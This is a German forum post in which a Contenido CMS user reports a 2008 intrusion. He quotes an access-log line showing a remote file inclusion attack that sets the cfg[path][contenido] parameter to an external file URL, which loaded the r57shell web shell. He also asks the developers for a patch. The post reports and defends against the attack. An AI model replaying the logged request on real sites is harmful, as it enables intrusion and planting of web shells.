Folgender Eintrag befindet sich in der Access-Log:
Code: Alles auswählen
- - [03/Jun/2008:23:32:27 +0200] "POST
/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.churchlawgroup.com/amember/main.txt.t
xt? HTTP/1.0" 200 33327
http://www.MEINE_ANGEGRIFFENE_DOMAIN.com/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.churchlawgro
up.com/amember/main.txt.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Die Datei ist eine bekannte Hackdatei: r57shell.php
Sie wurde unter dem Namen include.html.php im include-Verzeichnis gespeichert. Ich habe diese natürlich sofort gelöscht.
Mein Anbieter teilte mir folgendes mit:
Das ist die unsichere Variable in diesem aufgerufenen Script welche dann für einen so genannten CodeInjection missbraucht wurde:
cfg[path][contenido]=
Und dieser unsicheren Variable wurde diese URL angehängt:
http://www.churchlawgroup.com/amember/main.txt.txt?
Diese externe Textdatei enhält reinen Quellcode über den Angreifer zB. eine Art Dateiexplorer ausführen um fremde Dateien auf Ihren Account zu schieben.
Kann dies einer der Contenido-Entwickler bestätigen?
Ich bitte Euch schnellstmöglich einen Patch dafür bereitzustellen.
Vielen Dank und viele Grüße
Walter